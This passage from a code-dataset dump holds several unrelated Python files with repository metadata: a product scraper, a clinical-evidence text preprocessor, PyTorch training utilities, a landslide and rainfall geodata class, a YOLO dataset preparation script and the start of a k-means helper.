response):\t\t\t\n\t\tself.log(response.url)\n\t\tself.driver.get(response.url)\n\t\t\n\t\t#For list of subcategories of items wait for 15secs or until element is loaded\n\t\titems = WebDriverWait(self.driver, 15).until(EC.presence_of_element_located((By.CSS_SELECTOR, \"div.tab-content div.item.prod-deck.row.ng-scope div.clearfix div.ng-scope\"))\n\t\t)\n\t\t\n\t\t#For individual product\n\t\titem = WebDriverWait(self.driver, 15).until(EC.presence_of_element_located((By.CSS_SELECTOR, \"div.uiv2-product-detail-content.wid-250\"))\n\t\t)\n\t\n\t\tif items:\n\t\t\tself.log(\"Inside items\")\n\t\t\t#Product title rows\n\t\t\tproduct_titles = []\n\t\t\ttitle_rows = self.driver.find_elements(By.XPATH, '//*[@id=\"dynamicDirective\"]/product-deck/section/div[2]/div[4]/div[1]/div/div[1]/div[2]/div/div/product-template/div/div[4]/div/a')\n\t\t\t#Extract only the required value from the string\n\t\t\tfor row in title_rows:\n\t\t\t\tproduct_titles.append(row.get_attribute('text'))\n\t\t\tself.log(product_titles)\n\n\t\t\t#Product measurement rows\n\t\t\tproduct_measures = []\n\t\t\tmeasure_rows = self.driver.find_elements(By.XPATH, '//*[@id=\"dynamicDirective\"]/product-deck/section/div[2]/div[4]/div[1]/div/div[1]/div[2]/div/div/product-template/div/div[4]/div[2]/div//span[1]/span[@ng-bind=\"vm.selectedProduct.w\"]')\n\t\t\t#Extract only the required value from the string\n\t\t\tfor row in measure_rows:\n\t\t\t\tproduct_measures.append(row.text)\n\t\t\tself.log(product_measures)\n\t\t\t\n\t\t\t#Product MRP rows\n\t\t\tproduct_mrps = []\n\t\t\tmrp_rows = self.driver.find_elements(By.XPATH, '//*[@id=\"dynamicDirective\"]/product-deck/section/div[2]/div[4]/div[1]/div/div[1]/div[2]/div/div/product-template/div/div[4]/div[3]/div/div/h4/span[1]/span')\n\t\t\t#Extract only the MRP from the string\t\n\t\t\tfor row in mrp_rows:\n\t\t\t\tproduct_mrps.append(row.text)\n\t\t\tself.log(product_mrps)\n\n\t\t\t#Product final price rows\n\t\t\tproduct_prices = []\n\t\t\toffer_rows = self.driver.find_elements(By.XPATH, '//*[@id=\"dynamicDirective\"]/product-deck/section/div[2]/div[4]/div[1]/div/div[1]/div[2]/div/div/product-template/div/div[4]/div[3]/div/div[1]/h4/span[2]/span')\n\t\t\t#Extract the final price 
from the string\t\n\t\t\tfor row in offer_rows:\n\t\t\t\tproduct_prices.append(row.text)\n\t\t\tself.log(product_prices)\n\n\t\telif item is not None:\n\t\t\tself.log(\"Inside item\")\n\t\t\t#Product title rows\n\t\t\tproduct_titles = []\n\t\t\ttitle = self.driver.find_element(By.XPATH, '//*[@id=\"slidingProduct*\"]/div[2]/div[2]/h1').text\n\t\t\tproduct_titles.append(title)\n\t\t\tself.log(product_titles)\n\n\t\t\t#Product measurement rows\n\t\t\tproduct_measures = []\n\t\t\t#measure = self.driver.find_element(By.CSS_SELECTOR, \"div.uiv2-product-detail-content.wid-250 div.uiv2-product-size div.uiv2-size-variants label\").split(\"
    \", \"\")\n\n\ndef extract_text_from_prompts(prompts_df):\n I, C, O = prompts_df['Intervention'].values, prompts_df['Comparator'].values, prompts_df['Outcome'].values\n all_prompt_text = [s.lower() for s in np.concatenate([I, C, O])]\n return all_prompt_text\n\n\ndef get_inference_vectorizer(article_ids=None, sections_of_interest=None, vocabulary_file=None):\n\n # if article_ids is None, will use all articles\n # in the CSV passed to the read_in_articles method.\n articles = read_in_articles(article_ids=article_ids)\n raw_texts = [extract_raw_text(article, sections_of_interest) for article in articles]\n\n # we also use the prompts text to construct our vectorizer\n prompts = read_prompts()\n raw_prompt_text = \" \".join(extract_text_from_prompts(prompts))\n\n raw_texts.append(raw_prompt_text)\n\n # there is at least one prompt with tokens short enough that CountVectorizer's default destroys it, so we allow any single character through.\n if vocabulary_file is not None:\n with open(vocabulary_file, 'r') as vf:\n vocab = [line.strip() for line in vf]\n vectorizer = CountVectorizer(vocabulary=vocab, token_pattern=r\"\\b\\w+\\b\")\n print(\"Loaded {} words from vocab file {}\".format(len(vocab), vocabulary_file))\n else:\n vectorizer = CountVectorizer(max_features=20000, token_pattern=r\"\\b\\w+\\b\")\n vectorizer.fit(raw_texts)\n tokenizer = vectorizer.build_tokenizer() \n\n str_to_idx = vectorizer.vocabulary_\n str_to_idx[SimpleInferenceVectorizer.PAD] = max(vectorizer.vocabulary_.values())\n str_to_idx[SimpleInferenceVectorizer.UNK] = str_to_idx[SimpleInferenceVectorizer.PAD]+1\n \n # note that for now the vectorizer is fit using only the\n # article texts (i.e., the vocab is based on words in full-texts,\n # not in prompts necessarily).\n return SimpleInferenceVectorizer(str_to_idx, tokenizer)\n\n\ndef read_annotations():\n anno_df = pd.read_csv(anno_csv_path)\n # we need to force EVIDENCE_COL_NAME to be strings in all cases; pandas occasionally reads some values as floats.\n anno_df = anno_df[anno_df.apply(lambda row: bool(row[VALID_LABEL]) and bool(row[VALID_REASONING]) and len(str(row[EVIDENCE_COL_NAME])) > 0 and row[LABEL] != 'invalid prompt', axis=1)]\n #annos[~annos[\"Answer_Val\"].isin([-1, 0, 1])]\n # TODO revisit this; right now just overwriting for convienence\n # anno_df[\"Answer_Val\"].replace({3:0}, inplace=True)\n return anno_df\n\n\ndef read_prompts():\n prompts_df = pd.read_csv(prompts_csv_path)\n prompts_df = prompts_df[prompts_df.apply(lambda row: all(map(lambda x: type(x) == str and x is not None and bool(x.strip()), [row['Comparator'], row['Intervention'], row['Outcome']])), axis=1)]\n return prompts_df \n\ndef assemble_Xy_for_prompts(training_prompts, inference_vectorizer, lbls_too=False, annotations=None, sections_of_interest=None, include_sentence_span_splits=False, include_raw_texts=False): \n Xy = []\n for prompt_id in training_prompts[PROMPT_ID_COL_NAME].values:\n if lbls_too:\n Xy_dict = inference_vectorizer.vectorize(training_prompts, prompt_id, \n include_lbls=True, annotations_df=annotations, sections_of_interest=sections_of_interest, \n include_sentence_span_splits=include_sentence_span_splits, include_raw_text=include_raw_texts)\n else:\n Xy_dict = inference_vectorizer.vectorize(training_prompts, prompt_id, sections_of_interest=sections_of_interest, \n include_sentence_span_splits=include_sentence_span_splits, include_raw_text=include_raw_texts)\n Xy.append(Xy_dict)\n return Xy\n\n\ndef _read_ids(f):\n with open(f, 'r') as tf:\n ids = 
list(int(x.strip()) for x in tf.readlines())\n ids_dict = OrderedDict()\n for x in ids:\n ids_dict[x] = x\n return set(ids_dict.keys())\n\ndef train_document_ids():\n \"\"\" Returns the set of document ids for a fixed training set \"\"\"\n return _read_ids(_train_id_file)\n\ndef validation_document_ids():\n \"\"\" Returns the set of document ids for a fixed validation set \"\"\"\n return _read_ids(_validation_id_file)\n\ndef test_document_ids():\n \"\"\" Returns the set of documents for a fixed test set \"\"\"\n return _read_ids(_test_id_file)\n\ndef get_train_Xy(train_doc_ids, sections_of_interest=None, vocabulary_file=None, include_sentence_span_splits=False, include_raw_texts=False):\n \"\"\" Loads the relevant documents, builds a vectorizer, and returns a list of training instances\"\"\"\n prompts = read_prompts()\n annotations = read_annotations()\n\n\n # filter out prompts for which we do not have annotations for whatever reason\n # this was actually just one case; not sure what was going on there.\n def have_annotations_for_prompt(prompt_id):\n return len(annotations[annotations[PROMPT_ID_COL_NAME] == prompt_id]) > 0\n\n prompts = [prompt for row_idx, prompt in prompts.iterrows() if \n have_annotations_for_prompt(prompt[PROMPT_ID_COL_NAME])]\n prompts = pd.DataFrame(prompts)\n\n inference_vectorizer = get_inference_vectorizer(article_ids=train_doc_ids, sections_of_interest=sections_of_interest, vocabulary_file=vocabulary_file)\n\n training_prompts = prompts[prompts[STUDY_ID_COL].isin(train_doc_ids)]\n\n training_prompts = pd.DataFrame(training_prompts)\n train_Xy = assemble_Xy_for_prompts(training_prompts, inference_vectorizer, lbls_too=True, annotations=annotations, include_sentence_span_splits=include_sentence_span_splits, include_raw_texts=include_raw_texts)\n\n return train_Xy, inference_vectorizer\n\n\ndef get_Xy(docids, inference_vectorizer: 'SimpleInferenceVectorizer', sections_of_interest=None, include_sentence_span_splits=False, include_raw_texts=False):\n prompts = read_prompts()\n annotations = read_annotations()\n\n # filter out prompts for which we do not have annotations for whatever reason\n # this was actually just one case; not sure what was going on there.\n def have_annotations_for_prompt(prompt_id):\n return len(annotations[annotations[PROMPT_ID_COL_NAME] == prompt_id]) > 0\n\n prompts = [prompt for row_idx, prompt in prompts.iterrows() if\n have_annotations_for_prompt(prompt[PROMPT_ID_COL_NAME])]\n prompts = pd.DataFrame(prompts)\n\n prompts = prompts[prompts[STUDY_ID_COL].isin(docids)]\n Xy = assemble_Xy_for_prompts(prompts, inference_vectorizer, lbls_too=True, annotations=annotations, sections_of_interest=sections_of_interest, include_sentence_span_splits=include_sentence_span_splits, include_raw_texts=include_raw_texts)\n return Xy\n\n\nclass SimpleInferenceVectorizer:\n UNK = \"\"\n PAD = \"\"\n\n def __init__(self, str_to_idx, tokenizer):\n self.str_to_idx = str_to_idx\n self.idx_to_str = [None]*(len(self.str_to_idx))\n self.sentence_splits = {} # map of article ids to array of sentence splits\n self.token_evidence = {}\n \n for w, idx in self.str_to_idx.items():\n try:\n self.idx_to_str[idx] = w \n except:\n import pdb; pdb.set_trace()\n\n self.tokenizer = tokenizer\n\n def string_to_seq(self, s):\n tokenized = self.tokenizer(s)\n unk_idx = self.str_to_idx[SimpleInferenceVectorizer.UNK]\n vectorized = [self.str_to_idx.get(token, unk_idx) for token in tokenized]\n return np.array(vectorized)\n\n def vectorize(self, prompts_df, prompt_id, include_lbls=False, 
annotations_df=None, sections_of_interest=None, \n include_sentence_span_splits=False, include_raw_text=False):\n \"\"\"\n Vectorize the prompt specified by the ID.\n \"\"\"\n if include_lbls and annotations_df is None:\n raise ValueError(\"When including annotations, they must already be defined\")\n\n prompt = prompts_df[prompts_df[PROMPT_ID_COL_NAME]==prompt_id]\n\n ###\n # vectorize the article itself.\n article_id = str(prompt[STUDY_ID_COL].values[0])\n article = get_article(article_id)\n article_text = extract_raw_text(article, sections_of_interest)\n article_text = article_text.lower()\n vectorized_article = self.string_to_seq(article_text)\n \n ###\n # and now vectorize the prompt (I/C/O)\n I_v = self.string_to_seq(prompt[\"Intervention\"].values[0].lower())\n C_v = self.string_to_seq(prompt[\"Comparator\"].values[0].lower())\n O_v = self.string_to_seq(prompt[\"Outcome\"].values[0].lower())\n\n return_dict = {\"article\":vectorized_article, \"I\":I_v, \"C\":C_v, \"O\":O_v, \"a_id\": article_id, \"p_id\": prompt_id}\n\n if include_lbls:\n # then also read out the labels.\n assert (annotations_df is not None)\n annotations_for_prompt = annotations_df[annotations_df[PROMPT_ID_COL_NAME] == prompt_id]\n labels = annotations_for_prompt[[LBL_COL_NAME,EVIDENCE_COL_NAME]].values\n return_dict[\"y\"] = labels\n # remove html tags\n for l in labels:\n parser.feed(str(l[1]))\n l[1] = parser.get_data()\n \n spans = annotations_for_prompt[[EVIDENCE_START,EVIDENCE_END]].values\n if len(spans) > 0 and sections_of_interest is None:\n # split into sentences, find which are evidence, and also encode all.\n sentence_spans = []\n if include_raw_text or include_sentence_span_splits:\n sen = split_into_sentences(article_id, article_text, self.sentence_splits)\n if include_raw_text:\n return_dict[\"all_article_sentences\"] = sen \n\n if include_sentence_span_splits:\n tmp = find_span_location(sen, [s[0] for s in spans], [e[1] for e in spans])\n for t in tmp:\n sentence_spans.append([self.string_to_seq(t[0]), t[1]])\n \n # encode the evidence spans \n evidence_spans = set()\n for start, end in spans:\n article_before_span = article_text[:int(start)]\n # +1 because the slice gets every character (and therefore token) *before* the evidence, so we want to offset the token count by 1 to actually start in the evidence\n span_start_idx = len(self.tokenizer(article_before_span)) + 1\n article_at_end_of_span = article_text[:int(end)]\n span_end_idx = len(self.tokenizer(article_at_end_of_span))\n evidence_spans.add((span_start_idx, span_end_idx))\n \n return_dict['sentence_span'] = sentence_spans \n return_dict['evidence_spans'] = evidence_spans\n if include_sentence_span_splits:\n return_dict['token_ev_labels'] = gen_exact_evid_array(sentence_spans, evidence_spans, return_dict, self.idx_to_str)\n \n return return_dict\n\n def decode(self, v):\n return [self.idx_to_str[idx] for idx in v]\n","repo_name":"jayded/evidence-inference","sub_path":"evidence_inference/preprocess/preprocessor.py","file_name":"preprocessor.py","file_ext":"py","file_size_in_byte":16616,"program_lang":"python","lang":"en","doc_type":"code","stars":55,"dataset":"github-code","pt":"32"} +{"seq_id":"102199253","text":"import atexit\nimport functools\nimport logging\nimport os\nimport random\nimport sys\nfrom collections import defaultdict\nfrom dataclasses import fields, is_dataclass\nfrom typing import Any, Mapping, Protocol, runtime_checkable\n\nimport hydra\n\nimport numpy as np\nimport torch\nimport torch.distributed as dist\nfrom 
iopath.common.file_io import g_pathmgr\nfrom omegaconf import OmegaConf\n\n\ndef register_omegaconf_resolvers():\n OmegaConf.register_new_resolver(\"get_method\", hydra.utils.get_method)\n OmegaConf.register_new_resolver(\"get_class\", hydra.utils.get_class)\n OmegaConf.register_new_resolver(\"times\", lambda x, y: x * y)\n OmegaConf.register_new_resolver(\"divide\", lambda x, y: x / y)\n OmegaConf.register_new_resolver(\"range\", lambda x: list(range(x)))\n OmegaConf.register_new_resolver(\"int\", lambda x: int(x))\n\n\ndef setup_distributed_backend(backend):\n \"\"\"\n Initialize torch.distributed and set the CUDA device.\n Expects environment variables to be set as per\n https://pytorch.org/docs/stable/distributed.html#environment-variable-initialization\n along with the environ variable \"LOCAL_RANK\" which is used to set the CUDA device.\n This is run inside a new process, so the cfg is reset and must be set explicitly.\n \"\"\"\n local_rank = int(os.environ[\"LOCAL_RANK\"])\n torch.distributed.init_process_group(backend=backend)\n\n\ndef get_machine_local_and_dist_rank():\n \"\"\"\n Get the distributed and local rank of the current gpu.\n \"\"\"\n local_rank = int(os.environ.get(\"LOCAL_RANK\", None))\n distributed_rank = int(os.environ.get(\"RANK\", None))\n assert (\n local_rank is not None and distributed_rank is not None\n ), \"Please set the RANK and LOCAL_RANK environment variables.\"\n return local_rank, distributed_rank\n\n\ndef print_cfg(cfg):\n \"\"\"\n Supports printing both Hydra DictConfig and also the AttrDict config\n \"\"\"\n logging.info(\"Training with config:\")\n logging.info(OmegaConf.to_yaml(cfg))\n\n\ndef set_seeds(seed_value, max_epochs, dist_rank):\n \"\"\"\n Set the python random, numpy and torch seed for each gpu. Also set the CUDA\n seeds if CUDA is available. 
This ensures deterministic nature of the training.\n \"\"\"\n # Since in the pytorch sampler, we increment the seed by 1 for every epoch.\n seed_value = (seed_value + dist_rank) * max_epochs\n logging.info(f\"MACHINE SEED: {seed_value}\")\n random.seed(seed_value)\n np.random.seed(seed_value)\n torch.manual_seed(seed_value)\n if torch.cuda.is_available():\n torch.cuda.manual_seed_all(seed_value)\n\n\ndef makedir(dir_path):\n \"\"\"\n Create the directory if it does not exist.\n \"\"\"\n is_success = False\n try:\n if not g_pathmgr.exists(dir_path):\n g_pathmgr.mkdirs(dir_path)\n is_success = True\n except BaseException:\n logging.info(f\"Error creating directory: {dir_path}\")\n return is_success\n\n\ndef is_dist_avail_and_initialized():\n if not dist.is_available():\n return False\n if not dist.is_initialized():\n return False\n return True\n\n\ndef get_amp_type(amp_type: str):\n\n assert amp_type in [\"bfloat16\", \"float16\"], \"Invalid Amp type.\"\n\n if amp_type == \"bfloat16\":\n return torch.bfloat16\n else:\n return torch.float16\n\n\n@runtime_checkable\nclass _CopyableData(Protocol):\n def to(self, device: torch.device, *args: Any, **kwargs: Any):\n \"\"\"Copy data to the specified device\"\"\"\n ...\n\n\ndef _is_named_tuple(x) -> bool:\n return isinstance(x, tuple) and hasattr(x, \"_asdict\") and hasattr(x, \"_fields\")\n\n\ndef copy_data_to_device(data, device: torch.device, *args: Any, **kwargs: Any):\n \"\"\"Function that recursively copies data to a torch.device.\n\n Args:\n data: The data to copy to device\n device: The device to which the data should be copied\n args: positional arguments that will be passed to the `to` call\n kwargs: keyword arguments that will be passed to the `to` call\n\n Returns:\n The data on the correct device\n \"\"\"\n\n if _is_named_tuple(data):\n return type(data)(\n **copy_data_to_device(data._asdict(), device, *args, **kwargs)\n )\n elif isinstance(data, (list, tuple)):\n return type(data)(copy_data_to_device(e, device, *args, **kwargs) for e in data)\n elif isinstance(data, defaultdict):\n return type(data)(\n data.default_factory,\n {\n k: copy_data_to_device(v, device, *args, **kwargs)\n for k, v in data.items()\n },\n )\n elif isinstance(data, Mapping):\n return type(data)(\n {\n k: copy_data_to_device(v, device, *args, **kwargs)\n for k, v in data.items()\n }\n )\n elif is_dataclass(data) and not isinstance(data, type):\n new_data_class = type(data)(\n **{\n field.name: copy_data_to_device(\n getattr(data, field.name), device, *args, **kwargs\n )\n for field in fields(data)\n if field.init\n }\n )\n for field in fields(data):\n if not field.init:\n setattr(\n new_data_class,\n field.name,\n copy_data_to_device(\n getattr(data, field.name), device, *args, **kwargs\n ),\n )\n return new_data_class\n elif isinstance(data, _CopyableData):\n return data.to(device, *args, **kwargs)\n return data\n\n\ndef move_optimizer_state_to_device(\n optimizer: torch.optim.Optimizer, device: torch.device\n) -> torch.optim.Optimizer:\n optimizer.state = copy_data_to_device(optimizer.state, device)\n return optimizer\n\n\nclass AverageMeter(object):\n \"\"\"Computes and stores the average and current value\"\"\"\n\n def __init__(self, name, device, fmt=\":f\"):\n self.name = name\n self.fmt = fmt\n self.device = device\n self.reset()\n\n def reset(self):\n self.val = 0\n self.avg = 0\n self.sum = 0\n self.count = 0\n self._allow_updates = True\n\n def update(self, val, n=1):\n self.val = val\n self.sum += val * n\n self.count += n\n self.avg = self.sum / 
self.count\n\n def synchronize(self):\n assert self._allow_updates, \"Please reset the meter to allow synchronization.\"\n if not is_dist_avail_and_initialized():\n return\n t = torch.tensor(\n [self.sum, self.count], dtype=torch.float64, device=self.device\n )\n dist.barrier()\n dist.all_reduce(t)\n t = t.tolist()\n self.sum = int(t[0])\n self.count = t[1]\n self.avg = self.sum / self.count if self.count > 0 else np.nan\n self._allow_updates = False\n\n def __str__(self):\n fmtstr = \"{name} {val\" + self.fmt + \"} ({avg\" + self.fmt + \"})\"\n return fmtstr.format(**self.__dict__)\n\n\nclass ProgressMeter(object):\n def __init__(self, num_batches, meters, prefix=\"\"):\n self.batch_fmtstr = self._get_batch_fmtstr(num_batches)\n self.meters = meters\n self.prefix = prefix\n\n def display(self, batch):\n entries = [self.prefix + self.batch_fmtstr.format(batch)]\n entries += [str(meter) for meter in self.meters]\n logging.info(\"\\t\".join(entries))\n\n def synchronize(self):\n for meter in self.meters:\n meter.synchronize()\n\n def _get_batch_fmtstr(self, num_batches):\n num_digits = len(str(num_batches // 1))\n fmt = \"{:\" + str(num_digits) + \"d}\"\n return \"[\" + fmt + \"/\" + fmt.format(num_batches) + \"]\"\n\n\ndef get_resume_checkpoint(checkpoint_save_dir):\n\n if not g_pathmgr.isdir(checkpoint_save_dir):\n return None\n ckpt_file = os.path.join(checkpoint_save_dir, \"checkpoint.pt\")\n if not g_pathmgr.isfile(ckpt_file):\n return None\n\n return ckpt_file\n\n\n# TODO: Move this to a separate logging file.\n\n\ndef setup_logging(name, output_dir=None, rank=0):\n \"\"\"\n Setup various logging streams: stdout and file handlers.\n For file handlers, we only setup for the master gpu.\n \"\"\"\n # get the filename if we want to log to the file as well\n log_filename = None\n if output_dir:\n makedir(output_dir)\n if rank == 0:\n log_filename = f\"{output_dir}/log.txt\"\n\n logger = logging.getLogger(name)\n logger.setLevel(logging.DEBUG)\n\n # create formatter\n FORMAT = \"%(levelname)s %(asctime)s %(filename)s:%(lineno)4d: %(message)s\"\n formatter = logging.Formatter(FORMAT)\n\n # clean up any pre-existing handlers\n for h in logger.handlers:\n logger.removeHandler(h)\n logger.root.handlers = []\n\n # setup the console handler\n console_handler = logging.StreamHandler(sys.stdout)\n console_handler.setLevel(logging.DEBUG)\n console_handler.setFormatter(formatter)\n logger.addHandler(console_handler)\n\n # we log to file as well if user wants\n if log_filename and rank == 0:\n file_handler = logging.StreamHandler(_cached_log_stream(log_filename))\n file_handler.setLevel(logging.DEBUG)\n file_handler.setFormatter(formatter)\n logger.addHandler(file_handler)\n\n logging.root = logger\n\n\n# cache the opened file object, so that different calls to `setup_logger`\n# with the same file name can safely write to the same file.\n@functools.lru_cache(maxsize=None)\ndef _cached_log_stream(filename):\n # we tune the buffering value so that the logs are updated\n # frequently.\n log_buffer_kb = 10 * 1024 # 10KB\n io = g_pathmgr.open(filename, mode=\"a\", buffering=log_buffer_kb)\n atexit.register(io.close)\n return io\n\n\ndef shutdown_logging():\n \"\"\"\n After training is done, we ensure to shut down all the logger streams.\n \"\"\"\n logging.info(\"Shutting down loggers...\")\n handlers = logging.root.handlers\n for handler in handlers:\n 
handler.close()\n","repo_name":"facebookresearch/omnivore","sub_path":"omnivision/utils/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":9955,"program_lang":"python","lang":"en","doc_type":"code","stars":525,"dataset":"github-code","pt":"32"} +{"seq_id":"24588082881","text":"import os\nimport rasterio\nimport pandas as pd\nimport geopandas as gp\nfrom matplotlib import pyplot as plt\nfrom functools import reduce\nfrom geopandas import GeoDataFrame\nfrom shapely.geometry import Polygon, Point\nfrom rasterio.features import shapes\n\nclass Slidding:\n\n\texport_rain = pd.DataFrame()\n\tdeslizamientos = pd.DataFrame()\t\n\tmunicipios = pd.DataFrame()\n\tfolder = '../Datos/CHIRPS/'\n\trasters = []\n\n\tdef __init__(self, folder = '../Datos/CHIRPS/') -> None:\n\t\tself.folder = folder\n\n\tdef get_date(self, tiff_path):\n\t\ttiff_name = tiff_path.split('/')[-1]\n\t\tdate = '-'.join(tiff_name.split('.')[:-1])\n\t\treturn date\n\n\tdef open_tiff(self, src, date, mask = None):\n\t\tresults = []\n\t\tfor s, v in shapes(src.read(), mask=mask, transform=src.meta['transform']):\n\t\t\tdata = {\n\t\t\t\t'properties': {date: v}, \n\t\t\t\t'geometry': Polygon(s['coordinates'][0]).centroid\n\t\t\t}\n\t\t\tresults.append(data)\n\t\treturn results\n\n\tdef get_raster(self, path):\n\t\tsrc = rasterio.open(path)\n\t\tcrs = src.read_crs()\n\t\tdate = self.get_date(path)\n\t\ttiff = self.open_tiff(src, date)\n\t\tsrc.close()\n\t\traster = GeoDataFrame.from_features(tiff, crs=crs)\n\t\traster['geometry'] = raster['geometry'].to_crs(crs)\n\t\treturn raster\n\n\tdef get_rasters(self):\n\t\tfor file in os.listdir(self.folder):\n\t\t\tif file.endswith('.tif'):\n\t\t\t\tpath = os.path.join(self.folder, file)\n\t\t\t\traster = self.get_raster(path)\n\t\t\t\tself.rasters.append(raster)\n\t\treturn self.rasters\n\n\tdef get_municipios(self):\n\t\tself.municipios = gp.read_file('procesamiento/MGN_ANM_MPIOS.geojson')\n\t\tself.municipios = self.municipios[['DPTO_CCDGO', 'MPIO_CCDGO', 'geometry']]\n\t\treturn self.municipios\n\n\tdef run(self):\n\t\tself.get_rasters()\n\t\tself.get_municipios()\n\t\t\n\t\tself.deslizamientos = gp.read_file('procesamiento/INVENTARIO_FINAL_MM.csv')\n\t\tself.deslizamientos.columns = ['movimiento', 'fecha', 'municipio', 'latitud', 'longitud', 'fuente', 'geometry']\n\t\tself.deslizamientos.geometry = self.deslizamientos.apply(lambda row: Point(float(row['longitud']), float(row['latitud'])), axis=1)\n\t\t# print(deslizamientos.shape)\n\n\t\tself.deslizamientos = self.deslizamientos[['geometry', 'movimiento', 'fecha', 'fuente']]\n\t\tself.deslizamientos.fecha = pd.to_datetime(self.deslizamientos.fecha, format='%d/%m/%Y')\n\t\tself.deslizamientos.set_crs(epsg=4326, inplace=True)\n\t\t# print(deslizamientos.shape)\n\n\t\tself.deslizamientos = self.deslizamientos[self.deslizamientos.fecha >= '2010-01-01']\n\t\t# print(deslizamientos.shape)\n\t\t# deslizamientos.head()\n\n\t\treturn self.deslizamientos\n\n\tdef export_to_geoJson(self):\n\t\t\n\t\tmunicipios = gp.read_file('procesamiento/MGN_ANM_MPIOS.geojson')\n\t\tmunicipios = municipios[['DPTO_CCDGO', 'MPIO_CCDGO', 'geometry']]\n\t\tprint(municipios.shape)\n\t\tmunicipios.head()\n\n\t\t# Obtener los municipios que contienen deslizamientos\n\t\tgeodata = gp.sjoin(self.deslizamientos, municipios, how='left', predicate='intersects')\n\t\tgeodata = geodata[geodata['index_right'].notna()]\n\t\tgeodata = geodata.drop(columns=['index_right'])\n\t\t# print(geodata.shape)\n\t\t# Exportar a 
GeoJSON\n\t\tgeodata.to_file('deslizamientos.geojson', driver='GeoJSON')\n\t\t# geodata.head()","repo_name":"karinstefa/VA_project","sub_path":"Slidding.py","file_name":"Slidding.py","file_ext":"py","file_size_in_byte":3071,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"38387809784","text":"\n\"\"\"\nNoting down steps followed:\n\n1. The ultralytics weights file - made a copy in drive and moved it to the required folder in drive itself\n2. Locally create the folder structure as mentioned here https://github.com/theschoolofai/YoloV3\n3. Created custom.data and custom.names locally inside customdata folder\n4. Changed Images/ to \"data/customdata/images\" in train.txt\n5. Changed .txt to .jpg in train.txt\n6. In train.txt, file named \"Aimgg_005.jpg\" is a typo - so rename it to Aimg_005.jpg\n7. In test.txt, the file named ImageYolo.jpg does not exist, so remove it\n8. In test.txt, the file named M/img_010 does not exist - so rename it to Mimg_010\n\n\"\"\"\n\nimport os\nimport shutil\nimport zipfile as zp\n\nfrom PIL import Image\n\n\n\n\nZOHEB_ZIPFILE_PATH = \"/home/sai/Documents/repos_and_projects/personal_projects/tsai_projects/assignment13_yolo/YoloV3_Dataset.zip\"\nCUSTOMDATA_FOLDERPATH = \"/home/sai/Documents/repos_and_projects/personal_projects/tsai_projects/assignment13_yolo/images_structured/customdata\"\n\nARRANGED_IMGFOLDER = CUSTOMDATA_FOLDERPATH + \"/images\"\nARRANGED_LBLFOLDER = CUSTOMDATA_FOLDERPATH + \"/labels\"\n\n\n# Code for checking if any value in label texts is above 1.000\n\n\n\n\n# Code for checking if file exists:\n\n\nwith open(\"./data/customdata/train.txt\",\"r\") as infl:\n for k in infl:\n k = k.strip()\n if not os.path.exists( \"/home/sai/Documents/repos_and_projects/personal_projects/tsai_projects/assignment13_yolo/\" + k.replace(\"./\",\"\") ):\n print( \"/home/sai/Documents/repos_and_projects/personal_projects/tsai_projects/assignment13_yolo/\" + k.replace(\"./\",\"\") )\n\n\n\n\ndef make_filepath_list(imgfolder, lblfolder):\n image_files = [ os.path.splitext(l)[0] for l in os.listdir(imgfolder) ]\n label_files = [ os.path.splitext(l)[0] for l in os.listdir(lblfolder) ]\n\n image_names = [ os.path.splitext(l)[0] for l in os.listdir(imgfolder) ]\n\n \n\n\n\ndef rearrange_images_labels_and_zip(zipfile_path, customdata_folderpath):\n\n extract_path, extract_folder = os.path.split(zipfile_path)\n extract_folder = extract_folder.replace(\".zip\",\"\")\n\n # Extract contents from zip\n with zp.ZipFile(zipfile_path, \"r\") as zip:\n zip.extractall()\n\n # Define relevant file paths\n imgfolder = extract_folder + \"/Images\"\n lblfolder = extract_folder + \"/Labels\"\n train_file_list = extract_folder + \"/train.txt\"\n test_file_list = extract_folder + \"/test.txt\"\n name_list = extract_folder + \"/classes.txt\"\n\n dest_imgfolder = ARRANGED_IMGFOLDER\n dest_lblfolder = customdata_folderpath + \"/labels\"\n dest_train_file_list = customdata_folderpath + \"/train.txt\"\n dest_test_file_list = customdata_folderpath + \"/test.txt\"\n dest_name_list = customdata_folderpath + \"/custom.names\"\n \n\n shutil.copytree(imgfolder, dest_imgfolder, dirs_exist_ok=True)\n shutil.copytree(lblfolder, dest_lblfolder, dirs_exist_ok=True)\n shutil.copy(train_file_list, dest_train_file_list)\n shutil.copy(test_file_list, dest_test_file_list)\n shutil.copy(name_list, dest_name_list)\n\n\n\ndef rename_image_exts(arranged_imgfolder):\n\n image_filenames = os.listdir(arranged_imgfolder)\n\n for fl in image_filenames:\n fil, ex 
= os.path.splitext(fl)\n if ex != \".jpg\":\n print(fl)\n\n if ex == \".png\":\n png_to_jpg(image_filepath=os.path.join(arranged_imgfolder, fl))\n else:\n os.rename( os.path.join(arranged_imgfolder, fl), \n os.path.join(arranged_imgfolder, fil+\".jpg\") )\n\n\n\ndef png_to_jpg(image_filepath):\n im = Image.open(image_filepath)\n rgb_im = im.convert(\"RGB\")\n rgb_im.save(image_filepath.replace(\".png\",\".jpg\"))\n os.remove(image_filepath)\n\n\ndef clip_to_ones_in_labels():\n pass\n\n\n\nif __name__ == \"__main__\":\n rearrange_images_labels_and_zip(zipfile_path=ZOHEB_ZIPFILE_PATH, \n customdata_folderpath=CUSTOMDATA_FOLDERPATH)\n# rename_image_exts(arranged_imgfolder=ARRANGED_IMGFOLDER)\n\n\n\n\n","repo_name":"sairamsubramaniam/tsai_projects","sub_path":"assignment13_yolo/yolo_ppe/cleanup_prepare.py","file_name":"cleanup_prepare.py","file_ext":"py","file_size_in_byte":3984,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"11919794095","text":"import sys\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom sklearn.cluster import KMeans\n\n\ndef kmean_cluster(df,clusters):\n\n kmeans_df = df[['principal component 1', 'principal component 2']].copy()\n kmeans = KMeans(init=\"k-means++\", n_clusters=clusters).fit(kmeans_df)\n labels = kmeans.labels_\n X_dist = (kmeans.transform(kmeans_df))\n\n distance = []\n\n for inner_list in X_dist:\n distance.append((min(inner_list)))\n\n kmeans_df['PRED'] = labels\n kmeans_df['test_name'] = df['test_name'].values\n kmeans_df['distance'] = distance\n\n grouped_df = kmeans_df.groupby(\"PRED\")\n grouped_lists = grouped_df[\"test_name\"].apply(list)\n grouped_lists = 